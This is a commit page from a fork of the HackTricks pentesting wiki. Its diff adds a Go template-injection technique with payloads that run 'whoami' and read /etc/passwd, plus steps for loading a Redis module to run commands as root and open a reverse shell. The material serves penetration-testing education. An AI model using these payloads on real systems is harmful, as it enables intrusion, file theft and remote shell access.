coelner/hacktricks
1
0
Fork 0
Code Issues Pull Requests Packages Projects Releases Wiki Activity

GitBook: [master] 472 pages modified

Browse Source
This commit is contained in:
CPol 2021-05-27 10:20:50 +00:00 committed by gitbook-bot
parent 003cba43da
commit 9e80c3be33
No known key found for this signature in database
GPG Key ID: 07D2180C7B12D0FF
2 changed files with 28 additions and 0 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

10
pentesting-web/ssti-server-side-template-injection.md
View File

@ -343,6 +343,16 @@ Even if it's perl it uses tags like ERB in Ruby.
<% perl code %>
```
### Method Confusion in GO
It's possible to **call methods of the object** that is passed to the context of the template.
For example if an object has the method `System` to execute a command or the method `File` to read a file you could achieve **RCE** o **read arbitrary files** with:
* `{{.System "whoami"}}`
* `{{.File "/etc/passwd}}`
More information in the original research [https://www.onsecurity.io/blog/go-ssti-method-research/](https://www.onsecurity.io/blog/go-ssti-method-research/)
## BlackHat PDF
{% file src="../.gitbook/assets/en-server-side-template-injection-rce-for-the-modern-web-app-blackhat-15.pdf" %}

18
pentesting/6379-pentesting-redis.md
View File

@ -167,6 +167,24 @@ The last exampleis for Ubuntu, for **Centos**, the above command should be: `red
This method can also be used to earn bitcoin [yam](https://www.v2ex.com/t/286981#reply14)
### Load Redis Module
1. Following the instructions from [https://github.com/n0b0dyCN/RedisModules-ExecuteCommand](https://github.com/n0b0dyCN/RedisModules-ExecuteCommand) you can **compile a redis module to execute arbitrary commands**.
2. Then you need some way to **upload the compiled** module
3. **Load the uploaded module** at runtime with `MODULE LOAD /path/to/mymodule.so`
4. **List loaded modules** to check it was correctly loaded: `MODULE LIST`
5. **Execute** **commands**:
```text
127.0.0.1:6379> system.exec "id"
"uid=0(root) gid=0(root) groups=0(root)\n"
127.0.0.1:6379> system.exec "whoami"
"root\n"
127.0.0.1:6379> system.rev 127.0.0.1 9999
```
6. Unload the module whenever you want: `MODULE UNLOAD mymodule`
### LUA sandbox bypass
[**Here**](https://www.agarri.fr/blog/archives/2014/09/11/trying_to_hack_redis_via_http_requests/index.html) you can see that Redis uses the command **EVAL** to execute **Lua code sandboxed**. In the linked post you can see **how to abuse it** using the **dotfile** function, but [apparently](https://stackoverflow.com/questions/43502696/redis-cli-code-execution-using-eval) this isn't no longer possible. Anyway, if you can **bypass the Lua** sandbox you could **execute arbitrary** commas on the system. Also, from the same post you can see some **options to cause DoS**.